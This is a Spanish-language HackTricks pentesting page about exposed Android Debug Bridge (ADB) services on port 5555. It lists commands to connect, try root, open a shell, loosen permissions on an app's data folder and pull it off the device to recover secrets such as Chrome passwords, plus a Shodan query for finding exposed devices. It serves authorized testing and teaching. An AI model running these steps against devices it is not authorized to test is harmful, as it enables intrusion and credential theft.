hacktricks/network-services-pentesting/5555-android-debug-bridge.md
carlospolop 63bd9641c0 f
2023-06-05 20:33:24 +02:00

5 KiB

5555 - Android Debug Bridge

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Información básica

Android Debug Bridge (adb) es una herramienta versátil de línea de comandos que te permite comunicarte con un dispositivo. El comando adb facilita una variedad de acciones en el dispositivo, como instalar y depurar aplicaciones, y proporciona acceso a una shell Unix que puedes usar para ejecutar una variedad de comandos en un dispositivo. (de aquí)

Puerto predeterminado: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Conexión

Si encuentras el servicio ADB ejecutándose en un puerto de un dispositivo y puedes conectarte a él, puedes obtener una shell dentro del sistema:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Para más comandos de ADB, consulta la siguiente página:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Volcar datos de la aplicación

Para descargar completamente los datos de una aplicación, puedes:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Puedes usar este truco para recuperar información sensible como contraseñas de Chrome. Para obtener más información sobre esto, consulta la información y referencias proporcionadas aquí.

Shodan

  • android debug bridge
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥